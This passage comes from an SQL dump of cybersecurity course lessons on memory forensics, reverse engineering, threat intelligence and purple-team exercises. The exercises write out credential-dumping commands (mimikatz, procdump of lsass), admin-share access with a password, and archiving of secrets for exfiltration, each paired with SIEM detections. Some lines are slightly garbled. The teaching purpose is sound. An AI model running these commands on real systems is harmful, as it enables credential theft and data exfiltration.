(`malfind -p 1234`). -> Found RWX memory segment.\n5.  Dump the malware (`procdump -p 1234`). -> Save to disk for Reverse Engineering.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(665, 374, '## Process Analysis & Injection Detection\n\nMalware rarely runs as `virus.exe`. It hides inside legitimate processes. This is **Process Injection**.\n\n### 1. DLL Injection\n*   **Concept**: Force a legitimate process (e.g., Chrome) to load a malicious DLL.\n*   **Mechanism**:\n    1.  Malware runs.\n    2.  Allocates memory in Chrome (VirtualAllocEx).\n    3.  Writes path to evil DLL (WriteProcessMemory).\n    4.  CreateRemoteThread starting at LoadLibrary(\"evil.dll\").\n*   **Result**: The malware code runs *inside* Chrome\'s memory space. Firewalls allow Chrome.\n\n### 2. Process Hollowing (RunPE)\n*   **Concept**: A zombie suit.\n*   **Mechanism**:\n    1.  Start a legitimate process (e.g., `svchost.exe`) in \"Suspended Mode\".\n    2.  Unmap (Hollow out) the legitimate code from memory.\n    3.  Write the malware code into that empty space.\n    4.  Resume the thread.\n*   **Result**: Task Manager says \"svchost.exe\". The Hash on disk is clean (Microsoft signed). But the memory is pure malware.\n*   **Detection**: **Volatility `malfind`** spots this mismatch between the file on disk (VAD) and the content in RAM.\n\n### 3. Reflective DLL Injection\n*   Loading a DLL directly from memory without it ever touching the disk.\n*   Extremely hard to detect with traditional AV.\n*   Used heavily by tools like **Cobalt Strike** and **Metasploit** (Meterpreter).\n\n### 4. Atom Bombing / Propagate\n*   Using obscure Windows API mechanisms (Atom Tables, GUI Event Hooks) to trigger code execution in other processes without using the noisy \"CreateRemoteThread\" call.\n\n### The Analyst\'s Eye\nIn Memory Forensics, you look for **Inconsistencies**.\n*   The PEB (Process Environment Block) says the path is `C:WindowsSystem32svchost.exe`.\n*   The VAD (Virtual Address Descriptor) says the memory map is Private Commit (not maximizing a file).\n*   This discrepancy confirms Hollowing.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(666, 375, '## Hunting Rootkits & Hidden Processes\n\n**Rootkits** are the ninjas of malware. They modify the Kernel (Ring 0) to intercept the reality presented to the OS.\n\n### Direct Kernel Object Manipulation (DKOM)\n*   Windows keeps a list of processes in a Doubly Linked List (ActiveProcessLinks).\n*   Task Manager iterates this list to show you what runs.\n*   **The Attack**: A Rootkit simply \"unlinks\" its process node from the list.\n    *   Previous -> Next.\n    *   It literally disconnects itself.\n    *   The OS still schedules CPU time for it (because the Scheduler uses a different list), so it runs. But tools (TaskMgr, Sysinternals) that rely on the API list cannot see it.\n\n### Hunting with Cross-View Analysis\nThe technique of comparing different \"views\" of the system to find lies.\n*   **View 1**: The API List (`pslist`). (Modified by Rootkit).\n*   **View 2**: The Scheduler / Thread List (`thrdscan`). (Harder to modify without crashing).\n*   **View 3**: CSRSS Handles (`handles`).\n*   **Method**: `psscan` (Volatility) scans the raw physical RAM for structures that *look* like processes (EPROCESS blocks).\n    *   If `psscan` finds it, but `pslist` misses it -> **Rootkit Confirmed**.\n\n### Hooks (SSDT Hooking)\n*   **SSDT (System Service Descriptor Table)**: The map of System Calls.\n*   **Attack**: Malicious driver overwrites the address of `NtQuanryDirectoryFile`.\n    *   Original: Points to `ntoskrnl.exe`.\n    *   Hooked: Points to `evil_rootkit.sys`.\n*   When you ask for a file list, the Rootkit code runs first, filters the results, and then passes the request to the real Kernel.\n*   **Detection**: **`ssdt`** plugin in Volatility checks if any function pointer points outside the valid Kernel memory range.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(667, 376, '## Module 37 Review\nMemory Forensics is the ultimate truth.\n*   **Volatility**: The tool.\n*   **Injection**: Looking for RWX pages (`malfind`).\n*   **Rootkits**: Using Cross-View analysis (`pslist` vs `psscan`) to find hidden threats.\n\nNext: Reverse Engineering (Understanding the code itself).', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 14:22:44'),
(668, 381, '## RE Fundamentals: The Art of Dissection\n\n**Reverse Engineering (RE)** is taking apart a system to understand how it works. In malware analysis, it means turning a compiled binary (`.exe`) back into readable logic (Assembly/C).\n\n### Compiled vs. Interpreted\n*   **Interpreted (Python/JS)**: You receive the source code. Analysis is just \"reading\".\n*   **Compiled (C/C++/Go)**: The source code is translated into **Machine Code** (0s and 1s) by a compiler. You cannot see variable names or comments.\n\n### The Tools of the Trade\n1.  **Disassembler**: Translates Machine Code (Hex) into **Assembly Language** (ASM).\n    *   *Tool*: IDA Pro, Ghidra (Free, by NSA).\n    *   *Output*: `MOV EAX, 1` (Move 1 into Register EAX).\n2.  **Decompiler**: Attempts to translate ASM back into pseudo-C code.\n    *   *Tool*: Ghidra, Hex-Rays.\n    *   *Output*: `if (variable1 == 1) { download_virus(); }`\n    *   *Note*: It is never 100% accurate, but it is much easier to read than ASM.\n3.  **Debugger**: Runs the code step-by-step (Dynamic).\n    *   *Tool*: x64dbg (Windows), GDB (Linux).\n    *   *Action*: \"Pause execution right before it encrypts the file so I can see the key in memory.\"\n\n### The Goal of RE\nYou are not trying to re-write the source code. You are trying to answer specific questions:\n1.  Does it contain a Domain Generation Algorithm (DGA)?\n2.  What is the hardcoded C2 IP?\n3.  How does it bypass the Anti-Virus?', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(669, 382, '## x86/x64 Assembly Essentials\n\nYou don\'t need to write Assembly, but you must read it.\n\n### Registers (The CPU\'s pockets)\nThe CPU has small storage slots called Registers.\n*   **EAX / RAX**: The \"Accumulator\". Used for math and **Return Values**. (If a function returns \"Success\", EAX is usually 1 or 0).\n*   **EBX / RBX**: Base.\n*   **ECX / RCX**: Counter. Used in loops.\n*   **EDX / RDX**: Data.\n*   **EIP / RIP**: **Instruction Pointer**. This is the most important register. It points to the *next instruction* the CPU will execute.\n    *   *Buffer Overflow*: If you can overwrite EIP, you control the CPU.\n*   **ESP / RSP**: Stack Pointer. Points to the top of the stack.\n\n### Common Instructions\n1.  **MOV destination, source**: Copy data.\n    *   `MOV EAX, 5` -> Put 5 into EAX.\n2.  **ADD / SUB**: Math.\n3.  **CMP A, B**: Compare A and B.\n4.  **JMP / JZ / JNZ** (Jumps): The logic flow (If statements).\n    *   `CMP EAX, 0` (Check if EAX is 0)\n    *   `JZ 402000` (Jump if Zero to memory address 402000).\n    *   *Hacking Tip*: If you change `JZ` (Jump if Zero) to `JNZ` (Jump if NOT Zero), you can flip the logic of the program. (e.g., \"Is Password Correct?\" -> \"No\" -> \"Login Anyway\").\n\n### The Stack (LIFO)\nTemporary memory for functions.\n*   **PUSH**: Put something on top of the stack.\n*   **POP**: Take it off.\n*   Think of it like a stack of plates.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(670, 383, '## Static Analysis with Ghidra\n\n**Ghidra** is the NSA\'s gift to the community. It is a powerful, free Disassembler/Decompiler.\n\n### The Interface\n1.  **Program Tree**: Sections of the file (.text, .data, .rsrc).\n2.  **Listing View**: The Assembly code (linear view).\n3.  **Decompiler View**: The C-like pseudo-code. **(This is where you live)**.\n4.  **Symbol Tree**: List of Functions and Imports.\n\n### The Workflow\n1.  **Import**: Drag and Drop the malware.\n2.  **Analyze**: Run the auto-analysis (identifies functions, strings).\n3.  **Search Strings**: Find \"http\". Double click it.\n4.  **X-Ref (Cross Reference)**: Right-Click the string -> \"References\".\n    *   This shows *where in the code* that string is used.\n    *   Clicking it takes you to the `Main()` function that calls the C2.\n5.  **Rename**: Ghidra names variables `DAT_12345` or `FUN_401000`.\n    *   Your job is to read the logic.\n    *   \"This function takes a URL and downloads a file.\" -> Press `L`. Rename to `Download_File`.\n    *   \"This variable holds the IP.\" -> Rename to `C2_IP`.\n    *   Slowly, the code becomes readable.\n\n### Graph View\nVisualizes the flow control.\n*   Boxes are blocks of code.\n*   Arrows are Jumps (Green for Yes, Red for No).\n*   If you see a complex knot of arrows, it\'s a loop.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(671, 384, '## Debugging with x64dbg\n\nStatic analysis is hard when the code is obfuscated. A **Debugger** lets you run it and watch.\n\n### Key Concepts\n1.  **Breakpoints (BP)**: Trapwires using Software Interrupts (INT 3).\n    *   You tell the debugger: \"Run until you hit address 401050, then PAUSE.\"\n    *   *Use*: Put a BP on `CreateFileW`. The malware will run until it tries to create a file, then freeze. You can then look at the stack to see *filename* it is trying to write.\n2.  **Stepping**:\n    *   **Step Into (F7)**: Go inside the function call.\n    *   **Step Over (F8)**: Run the function and pause after it returns. (Use this to skip boring library functions like `printf`).\n3.  **Register/Memory View**:\n    *   Watch the EAX register change as you step.\n    *   Watch the memory dump to see encrypted strings suddenly become decrypted.\n\n### Patching\nYou can modify the binary in memory.\n*   **Scenario**: The malware checks `If (Year == 2023)`. It is 2025, so it quits.\n*   **Fix**:\n    1.  Find the `CMP Year, 2023` and `JNE Exit` instructions.\n    2.  Change the `JNE` (Jump Not Equal) to `NOP` (No Operation - Do nothing).\n    3.  The malware continues running.\n\n### Anti-Debugging\nMalware hates debuggers.\n*   **IsDebuggerPresent()**: A Windows API function that returns 1 if being debugged.\n*   **RDTSC**: Read Time Stamp Counter. Measures CPU cycles.\n    *   \"It took 5,000,000 cycles to run this instruction. Humans are slow. A debugger must be attached.\" -> *Self Destruct*.\n*   **Bypass**: Use plugins like **ScyllaHide** to hide your debugger from these checks.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(672, 385, '## Unpacking & Anti-Analysis\n\nMost malware is \"Packed\" (Compressed/Encrypted) to hide from AV signatures.\n\n### The Packer Lifecycle\n1.  **The Stub**: The small piece of code you actually see.\n2.  **Unpacking**: The Stub decrypts the *real* malware (Payload) from its data section and writes it into memory.\n    *   *Technique*: Uses `VirtualAlloc` (Get memory) -> `RtlDecompressBuffer` -> `VirtualProtect` (Make executable).\n3.  **Transfer (OEP)**: The Stub jumps to the **Original Entry Point** (OEP) of the payload.\n4.  **Execution**: The real malware runs.\n\n### Manual Unpacking Technique\n1.  Load packed malware into x64dbg.\n2.  Set breakpoints on `VirtualAlloc` and `VirtualProtect`.\n3.  Run code. It breaks when it allocates memory.\n4.  Watch that memory region. Step over until you see the PE Header (`MZ`) appear in the memory dump.\n5.  **Dump It**: Use \"Scylla\" (plugin) to save that memory region to a file (`unpacked.exe`).\n6.  Now open `unpacked.exe` in Ghidra. You will see the real strings and logic.\n\n### Dealing with Obfuscation\n*   **Dead Code**: Junk instructions that do nothing (`ADD EAX, 0`) just to confuse you.\n*   **Control Flow Flattening**: Breaking linear code into a confusing switch-statement mess.\n*   **String Encryption**: Strings are stored as `XOR 0x55`. The malware decrypts them only when needed.\n*   *Solution*: FLOSS (FireEye Labs Obfuscated String Solver). It runs code heuristics to find and extract obfuscated strings automatically.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(673, 386, '## Module 38 Review\nReverse Engineering is the deepest level of analysis.\n*   **Assembly**: The language of the CPU.\n*   **Ghidra**: The static map.\n*   **x64dbg**: The dynamic probe.\n*   **Unpacking**: Removing the armor to see the code.\n\nNext: Applying this knowledge to Threat Intelligence.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 14:22:44'),
(674, 391, '## The Threat Intel Lifecycle\n\nThreat Intelligence (CTI) is knowledge about adversaries. It moves security from \"What is hitting me?\" to \"Who is hitting me and why?\"\n\n### The Lifecycle\n1.  **Planning & Direction**: The \"Requirements\".\n    *   \"We are a Bank. We care about Fin7 (Credit Card thieves). We don\'t care about APTs targeting Aerospace.\"\n2.  **Collection**: Gathering raw data.\n    *   Open Source (OSINT): Twitter, GitHub, Blogs.\n    *   Closed Source: Vendor feeds (CrowdStrike, Mandiant), Deep Web forums.\n    *   Technical: HoneyPots, Malware Sandboxes.\n3.  **Processing**: Cleaning and normalizing.\n    *   Converting a PDF report into a list of IPs (STIX format).\n4.  **Analysis**: Making sense of it.\n    *   \"This new IP belongs to the same subnet used by Lazarus Group last year. It implies Lazarus is back.\"\n5.  **Dissemination**: Sending it to the right people.\n    *   **Strategic**: To the CISO (\"Risk is elevated\").\n    *   **Tactical**: To the SOC (\"Block these IPs\").\n6.  **Feedback**: \"Was this useful?\"\n\n### Types of CTI\n*   **Strategic**: High-level trends for Executives. (\"Ransomware is up 200%\").\n*   **Operational**: TTPs for Hunters. (\"They use PowerShell Empire\").\n*   **Tactical**: IOCs for SIEMs. (Hashes, IPs).', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(675, 392, '## Collection & Sources (OSINT vs. INT)\n\nWhere do we get the dirt?\n\n### OSINT (Open Source Intelligence)\n*   **Twitter (InfoSec Twitter)**: Often the fastest source. Researchers post \"I just found this C2\" minutes after detection.\n*   **VirusTotal**: The world\'s malware database.\n    *   *Hunting*: \"Search for all files that communicate with `bad-domain.com`.\"\n*   **Shodan/Censys**: Search engines for the Internet of Things.\n    *   \"Show me all servers running vulnerable Exchange 2016 in Germany.\"\n*   **AlienVault OTX (Open Threat Exchange)**: Crowd-sourced pulses.\n\n### Paid Feeds (Commercial)\n*   Companies like Recorded Future, Mandiant, Proofpoint.\n*   They have spies in Dark Web forums.\n*   Value: **Context**. Not just \"Block IP X\", but \"IP X is a Cobalt Strike server rented by Ryuk Ransomware affiliates.\"\n\n### ISACs (Information Sharing and Analysis Centers)\n*   Industry groups (FS-ISAC for Finance, H-ISAC for Health).\n*   \"We (Bank A) got hit by this. Here are the IOCs so you (Bank B) can block it.\"\n*   *Trust*: High.\n\n### Dark Web (Tor)\n*   Monitoring Ransomware leak sites.\n*   \"Company X has 2 days to pay.\" -> If Company X is your vendor, you have a Third-Party Risk problem.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(676, 393, '## Analysis & Attribution: The \"Who\"\n\nAttribution (Naming the actor) is hard and often political.\n\n### Levels of Attribution\n1.  **Infrastructure**: \"This attack came from IP 1.2.3.4 (DigitalOcean VPN).\" (Low value).\n2.  **Tooling**: \"They used \'PoisonIvy\', which is often used by Chinese groups.\" (Medium).\n3.  **TTPs**: \"They used the exact same 5-step process as APT10.\" (High).\n4.  **Strategic**: \"The attack targeted a dissident journalist critical of Country X.\" (Motivation).\n\n### The Diamond Model of Intrusion Analysis\nA simple shape to map attacks.\n1.  **Adversary**: Who? (Russia).\n2.  **Infrastructure**: What? (IPs/Domains).\n3.  **Capability**: How? (Malware/Exploits).\n4.  **Victim**: Whom? (You).\n*   *Pivot*: If you find a Malware sample (Capability) used by an Adversary, you can pivot to find their Infrastructure.\n\n### Cognitive Biases\nAnalysts must avoid traps.\n*   **Confirmation Bias**: Looking for evidence that supports your theory (\"It\'s Russia\") and ignoring evidence that contradicts it.\n*   **Mirror Imaging**: Assuming the attacker thinks like you. (\"They wouldn\'t attack on Christmas.\" Yes, they would).\n*   **False Flag**: Attackers verify sophisticated. The \"Olympic Destroyer\" malware (Russia) contained code snippets from North Korea to confuse analysts.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(677, 394, '## STIX/TAXII & Sharing\n\nWe need a standard language to share Intel between machines.\n\n### STIX (Structured Threat Information Expression)\nA JSON format for describing threats.\n*   **Objects**:\n    *   `Threat Actor`: The bad guy.\n    *   `Attack Pattern`: The TTP (CAPEC/ATT&CK).\n    *   `Indicator`: The Regex/Rule to find it.\n    *   `Observed Data`: The IP/Hash.\n*   *Example*: \"Actor A (STIX) uses Malware B (STIX) which connects to IP C (STIX).\"\n\n### TAXII (Trusted Automated Exchange of Intelligence Information)\nThe transport protocol (HTTPS API) to move STIX objects.\n*   **Server**: Host the feed (e.g., Anomali Limo).\n*   **Client**: Your SIEM polls the server.\n*   \"Hey Server, give me all new High-Confidence Ransomware IPs since yesterday.\"\n*   Server responds with STIX JSON.\n\n### MISP (Malware Information Sharing Platform)\nThe most popular Open Source Threat Intel Platform (TIP).\n*   Org A puts malware data into MISP.\n*   Org B\'s MISP syncs with Org A.\n*   Your SIEM connects to MISP and downloads the blocklist automatically.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(678, 395, '## Operationalizing Intel\n\nIntel is useless if it sits in a PDF. It must \"Drive Operations\".\n\n### 1. Alert Enrichment (Context)\n*   **Without Intel**: SIEM Alert \"Connection to 1.2.3.4\". Priority: Unknown.\n*   **With Intel**: SIEM Alert \"Connection to 1.2.3.4 (Known Conti Ransomware Node)\". Priority: **CRITICAL**.\n*   *How*: Connect your SIEM to a TIP.\n\n### 2. Retroactive Hunting\n*   Intel Report: \"In Jan 2024, Actor X used `evil.com`.\"\n*   Today is March 2024. Blocking it now helps, but...\n*   **Action**: Search your *Historical Logs* (Cold Storage). Did anyone talk to `evil.com` back in January?\n    *   If Yes: You have been compromised for 3 months. **Incident Response Start**.\n\n### 3. Vulnerability Prioritization\n*   Scanner says: \"You have 10,000 unpatched bugs.\"\n*   Intel says: \"Only CVE-2023-1234 is being actively exploited in the wild by Ransomware.\"\n*   **Action**: Patch CVE-2023-1234 *tonight*. The rest can wait.\n\n### 4. TTP-Based Defense\n*   Intel says: \"Lazarus is using LNK files in ZIP Archives.\"\n*   **Action**: Update Email Gateway to block `.lnk` attachments. Update EDR to alert on `cmd.exe` spawned from `explorer.exe` via LNK.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(679, 396, '## Module 39 Review\nThreat Intel gives you the \"Heads Up\".\n*   **Lifecycle**: Planning to Feedback.\n*   **Standards**: STIX (Language) / TAXII (Truck).\n*   **Attribution**: The Diamond Model.\n\nNext: Testing your defenses with Red and Purple Teams.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 14:23:36'),
(680, 401, '## Red, Blue, and Purple Teams\n\nThe color spectrum of information security.\n\n### Red Team (The Offensive)\n*   **Goal**: Simulate a real adversary to test defenses.\n*   **Mindset**: \"There is always a way in.\"\n*   **Method**: Zero-day exploits, Phishing, Social Engineering, Physical Intrusion.\n*   **Outcome**: A report saying \"We stole the Domain Admin password in 4 hours.\"\n\n### Blue Team (The Defensive)\n*   **Goal**: Detect and Respond.\n*   **Mindset**: \"Protect the Crown Jewels.\"\n*   **Method**: SIEM, EDR, Firewalls, Patching, Threat Hunting.\n*   **Outcome**: \"We blocked the Phishing email. We detected the scanner.\"\n\n### Purple Team (The Collaborative)\n*   **The Problem**: Red Teams and Blue Teams often hate each other.\n    *   Red: \"Blue team is useless, I pawned them easily.\"\n    *   Blue: \"Red team cheated, they used a vulnerability for a system we don\'t own.\"\n    *   *Result*: No learning happens.\n*   **The Solution**: Purple Teaming.\n    *   Red Team executes an attack (T1059 PowerShell).\n    *   Blue Team watches *in real-time*.\n    *   Red: \"Did you see that?\"\n    *   Blue: \"No.\"\n    *   Red: \"Okay, I will run it again. Tune your SIEM to look for X.\"\n    *   Blue: \"Got it! Alert triggered.\"\n\n### Why Purple is the Future\nIt moves from \"Win/Lose\" to \"Improvement\". The goal isn\'t to hack the company; the goal is to verify the detection logic.', 'markdown', 20, '2025-12-27 02:22:23', '2025-12-29 16:15:02'),
(681, 402, '## Red Team Operations\n\nRed Teaming is not just \"Running Nmap\". It is a full-scope simulation.\n\n### 1. Reconnaissance (OSINT)\n*   Scraping LinkedIn to find system admins.\n*   Looking for leaked credentials on the Dark Web.\n*   Mapping external IP ranges (Shodan).\n\n### 2. Weaponization & Delivery\n*   Creating custom malware (avoiding signature detection).\n*   Buying a look-alike domain (`cornpany.com`).\n*   Sending the Spearphishing email.\n\n### 3. Exploitation & Install\n*   User clicks link.\n*   Browser exploit runs.\n*   Beacon (C2) installed.\n\n### 4. Privilege Escalation\n*   Local Admin -> Domain Admin.\n*   Techniques: Kerberoasting, PrintNightmare.\n\n### 5. Lateral Movement\n*   Moving from \"Bob from Accounting\" to the \"Swift Payment Server\".\n\n### 6. Actions on Objectives\n*   Stealing the money. Encrypting the drive.\n\n### Rules of Engagement (ROE)\nA legal contract defining what Red Team is allowed to do.\n*   **Limits**: \"Do not attack the Production Database.\" \"Do not phish the CEO.\"\n*   **Emergency Contact**: If Red Team accidentally crashes a server, who do they call at 3 AM?', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(682, 403, '## Blue Team Defense\n\nThe Blue Team has the harder job. The Red Team only needs to be right *once*. The Blue Team needs to be right *every time*.\n\n### 1. Prevention (Hardening)\n*   \"Reduce the attack surface.\"\n*   Disable macros.\n*   Patch vulnerabilities.\n*   Enforce MFA.\n\n### 2. Detection (Monitoring)\n*   SIEM rules.\n*   Honeypots (Traps).\n*   Canary Tokens (Fake files that alert when opened).\n\n### 3. Response (IR)\n*   The fire brigade.\n\n### The \"Assume Breach\" Mentality\nModern Blue Teams assume the perimeter has failed. They focus on **Internal Monitoring**.\n*   \"I don\'t care if they get in. I care if they can move to the database without me seeing them.\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(683, 404, '## Purple Team Exercises\n\nA structured Purple Team exercise follows a script.\n\n### Phase 1: Planning\n*   **Objective**: \"Verify detection of Credential Dumping (T1003).\"\n*   **Tool**: Mimikatz.\n*   **Target**: Test Workstation A.\n\n### Phase 2: Execution (Round 1)\n*   Red: Runs `mimikatz.exe privilege::debug`.\n*   Blue: Checks SIEM. \"No Alert.\"\n*   Red: \"Okay, running `sekurlsa::logonpasswords`.\"\n*   Blue: \"No Alert.\"\n\n### Phase 3: Tuning\n*   Blue: \"Why did we miss it?\"\n    *   Investigation: \"We don\'t ingest Sysmon Event ID 10 (Process Access).\"\n*   **Fix**: Enable Sysmon config. Forward logs to Splunk. Write Search.\n\n### Phase 4: Execution (Round 2)\n*   Red: Runs `mimikatz.exe`.\n*   Blue: \"ALERT! Critical Severity - Credential Dumping detected.\"\n*   **Verdict**: Success.\n\n### Phase 5: Reporting\n*   \"We improved detection coverage for T1003 from 0% to 100%.\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(684, 405, '## Adversary Emulation\n\nRather than \"Generic Hacking\", we emulate specific Threat Groups.\n\n### Why?\n*   If you are a Bank, you care about **Carbanak**.\n*   If you are a Hospital, you care about **Ryuk**.\n\n### Tools\n1.  **Atomic Red Team (Red Canary)**: A library of simple scripts to test one technique.\n    *   `atomic-red-team.exe T1003` -> Runs a safe mimikatz command.\n2.  **CALDERA (MITRE)**: Automated adversary emulation platform.\n    *   Build a \"Profile\" (e.g., APT29).\n    *   Click \"Start\".\n    *   Caldera agents connect to C2 and execute the APT29 commands automatically.\n\n### The Value\nIt proves resilience against *relevant* threats.\n\"We know we can stop script kiddies. But can we stop the group that hacked our competitor last week?\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(685, 406, '## Module 40 Review\n*   **Red**: Attack.\n*   **Blue**: Defend.\n*   **Purple**: Collaborate.\n*   Adversary Emulation ensures your defense is relevant to real-world threats.\n\nNext: Running a Purple Team exercise step-by-step.', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 14:23:36'),
(686, 411, '## Exercise Framework Setup\n\nTo run a Purple Team exercise in your lab or company, you don\'t need expensive tools.\n\n### 1. The Target\nA standard Windows 10/11 VM.\n*   **Requirement**: It must have logging enabled (Sysmon) and forwarding to your SIEM.\n\n### 2. The Attack Tool\n**Atomic Red Team** is the gold standard for beginners.\n*   It is a folder of YAML files.\n*   Each file contains a command (PowerShell/CMD).\n*   No C2 infrastructure needed. It runs locally.\n\n### 3. The Execution\n*   Install `Invoke-AtomicRedTeam` (PowerShell module).\n*   Command: `Invoke-AtomicTest T1003 -CheckPrereqs`\n*   Command: `Invoke-AtomicTest T1003` (Runs the attack).\n\n### 4. The Tracker\nUse a spreadsheet (VECTR is a good free tool, but Excel works).\n*   Columns: Technique | Status | Detected? | Blocked? | Notes.\n*   Fill it out as you go.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(687, 412, '## Exercise: Credential Dumping (T1003)\n\n**Objective**: Detect extraction of passwords from memory.\n\n### The Attack (Atomic T1003.001)\n*   **Command**: `procdump -ma lsass.exe lsass_dump.dmp`\n*   **Context**: `lsass.exe` (Local Security Authority Subsystem Service) holds active credentials in RAM.\n*   **Tool**: Sysinternals ProcDump (legitimate Microsoft tool).\n\n### The Detection\n1.  **Process Name**: `procdump.exe` or `procdump64.exe`.\n2.  **Target Process**: `lsass.exe`.\n3.  **Command Line**: Contains `lsass`.\n\n### SIEM Search (Splunk)\n`index=windows EventCode=10 TargetImage=\"*lsass.exe\" GrantedAccess=\"0x1F0FFF\"`\n(Event 10 is Process Access. 0x1F0FFF is Full Access).\n\n### The Fix\nIf you missed it:\n1.  Install Sysmon.\n2.  Configure Sysmon to log Event ID 10 for Target `lsass.exe`.\n3.  Ingest logs.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(688, 413, '## Exercise: Lateral Movement (T1021)\n\n**Objective**: Detect movement between machines using SMB/Windows Admin Shares.\n\n### The Attack (Atomic T1021.002)\n*   **Command**: `net use \\TargetIPC$ /user:Admin Pa$$word`\n*   **Context**: Mapping the C: drive of a remote computer.\n\n### The Detection\n1.  **Event ID**: 4624 (Logon) Type 3 (Network).\n2.  **Event ID**: 5140 (Share Access).\n3.  **Share Name**: `\\*C$`, `\\*ADMIN$`, `\\*IPC$`.\n\n### SIEM Search\n`index=windows EventCode=5140 ShareName=\"*C$\" AccountName!=\"*$\" `\n(Exclude computer accounts ending in $).\n\n### Analysis\nWhy is \"Mary\" mapping the C$ drive of \"Bob\"?\n*   If Mary is HelpDesk -> Maybe okay.\n*   If Mary is HR -> **Malicious**.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(689, 414, '## Exercise: Data Exfiltration (T1048)\n\n**Objective**: Detect data leaving the network.\n\n### The Attack\n*   **Command**: Compress a folder into a ZIP and send it to an external FTP/HTTP server.\n*   **Atomic**: `7z a -t7z -mx=9 stolen_data.7z C:UsersPublicSecrets*`\n\n### The Detection\n1.  **Archiving**: Event 4688 (Process Create) -> `7z.exe` or `rar.exe` or `tar.exe`.\n    *   *Suspicious*: Running from a Temp directory.\n2.  **Network**: Firewall allow log to a non-business IP.\n    *   High Upload volume (> 10 MB).\n\n### SIEM Search\n`index=firewall action=allow bytes_out > 10000000 dest_port NOT IN (80, 443)`\n(Looking for FTP, SSH, or odd ports).\n\n### The Fix\n*   Block outbound connections on servers by default.\n*   Alert on large archive creation.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(690, 415, '## Metrics & Reporting\n\nHow do you prove Purple Teaming works?\n\n### The Scorecard\n*   **Detection Rate**: \"We detected 5/10 attacks (50%).\" -> \"Next month: 8/10 (80%).\"\n*   **Data Quality**: \"We had logs for 9/10 attacks, but no rule.\"\n*   **Alert Fidelity**: \"We had an alert, but it was classified as \'Info\' instead of \'Critical\'.\"\n\n### The Executive Report\n\"We simulated a Ransomware attack.\n*   Result: We successfully blocked execution.\n*   Gap: It took us 4 hours to detect the initial phishing email.\n*   Plan: Tune email gateway filter.\"\n\nThis creates a dashboard of **Continuous Improvement**.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(691, 416, '## Module 41 Review\nYou simulated an attack chain:\n*   Credentials Stolen -> Lateral Movement -> Exfiltration.\n*   You validated detections.\n\nNext: Modern security in Containers and Cloud.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 14:23:36'),
(692, 421, '## Container Security Fundamentals\n\n\"But it works on my machine!\" - The Developer.\n\n### What is a Container?\nA container (Docker) is a lightweight package of software that includes everything needed to run it: code, runtime, system tools, libraries.\n*   **Advantage**: Portability. It runs the same on a laptop as in the cloud.\n*   **Difference from VM**: It shares the **Host Kernel**. A VM has its own Kernel.\n    *   *Security Implication*: If you escape a VM, you hit the Hypervisor. If you escape a Container, you are on the Host Linux OS root.\n\n### The Attack Surface\n1.  **The Image**: Is the software (Nginx, Python) vulnerable?\n2.  **The Registry**: Where do you download images from? (Docker Hub).\n3.  **The Orchestrator**: Kubernetes (K8s) configuration.\n4.  **The Runtime**: The Docker daemon running on the host.\n\n### Ephemeral Nature\nContainers live for minutes.\n*   **SOC Nightmare**: \"Alert: TCP scan from Container ID a1b2c3d4.\"\n*   Analyst checks 10 minutes later. Container a1b2c3d4 is gone. Deleted.\n*   *Solution*: You need specialized Container Security tools that log events *instantly* to a central database.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(693, 422, '## Docker Security Hardening\n\nDocker is not secure by default.\n\n### 1. Rootless Mode\n*   **Risk**: By default, the Docker daemon runs as **root**.\n*   **Fix**: Configure Docker to run in \"Rootless Mode\" (User Namespace Remapping).\n*   *Why*: If a hacker breaks out of the container, they are \"nobody\" on the host, not \"root\".\n\n### 2. Capabilities (Linux Capabilities)\n*   Linux decomposes \"Root\" privileges into small slices (CAP_NET_ADMIN, CAP_SYS_BOOT, etc.).\n*   **Hardening**: Drop all capabilities, then add back only what you need.\n    *   `docker run --cap-drop=all --cap-add=NET_BIND_SERVICE ...`\n\n### 3. Read-Only Filesystem\n*   Containers should be **Immutable**. You shouldn\'t patch a running container; you deploy a new one.\n*   **Flag**: `--read-only`.\n*   *Why*: Attackers cannot download malware or modify `/etc/passwd`.\n\n### 4. Do not expose the Docker Socket\n*   `/var/run/docker.sock` is the API key to the kingdom. If you mount this into a container, that container has full root control over the host.\n*   **Rule**: Never mount the socket unless absolutely necessary (e.g., for a monitoring agent).', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
